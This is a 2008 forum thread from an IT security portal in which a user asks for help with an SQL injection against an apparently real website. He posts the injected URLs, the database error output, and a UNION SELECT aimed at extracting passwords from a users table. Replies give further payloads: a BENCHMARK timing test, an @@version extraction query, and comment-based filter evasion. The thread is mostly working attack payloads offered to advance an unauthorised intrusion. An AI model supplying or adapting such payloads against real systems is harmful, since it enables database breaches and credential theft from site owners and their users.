 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
sql inj HELP |
 |
 Posted: Thu Apr 17, 2008 4:22 pm |
 |
|
| kr0k0 |
| Advanced user |
 |
|
| Joined: Jan 26, 2008 |
| Posts: 128 |
|
|
|
 |
|
 |
|
Hi , i'am finding an exploit ,SQL inj but i have a problem with it ..
| Code: | | index.php?page=-1'a |
| Code: | -1\'a Match:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'a' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /homepages/12/d2116256/htdocs/site/index.php on line 151 |
i'am trying with ORDER BY
| Code: | | index.php?page=1+order+by+18 |
no error mysql
| Code: | | index.php?page=1+order+by+19 |
1 order by 19 Match:
| Code: | Unknown column '19' in 'order clause'
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /homepages/12/d2116256/htdocs/site/index.php on line 151 |
so , i try with UNION SELECT ..
| Code: | | index.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- |
no column found 
and test column and table [ i know the script ]
| Code: | | index.php?id=1+union+select+pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass+from+users-- |
Illegal mix of collations for operation 'UNION'
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /homepages/12/d2116256/htdocs/site/index.php on line 151
i try to test by convert() and unhex(hex()) , but not working ...
so , i need help waraxe  ?? and thanks ... |
|
|
|
|
|
|
|
|
| Posted: Thu Apr 17, 2008 5:25 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Try BENCHMARK function, see if it will work. If it works, then specific sql injection is useable, if not - then look for other sql injection cases in same target. |
|
|
|
|
| Posted: Fri Apr 18, 2008 11:49 am |
|
|
| Snap |
| Active user |
|
|
| Joined: Apr 14, 2008 |
| Posts: 25 |
|
|
|
|
|
|
|
try for example ..
| Code: |
null UNION SELECT null,null,null,null,null,null,null,null,null,null,@@version,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.TABLES--
|
|
|
|
|
|
| Posted: Fri Apr 18, 2008 5:20 pm |
|
|
| Tr4c3 |
| Regular user |
|
|
| Joined: Mar 29, 2008 |
| Posts: 10 |
|
|
|
|
|
|
|
You can try like this
| Quote: | | index.php?id=1/**/and/**/1=2/**/union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 198
Members: 0
Total: 198
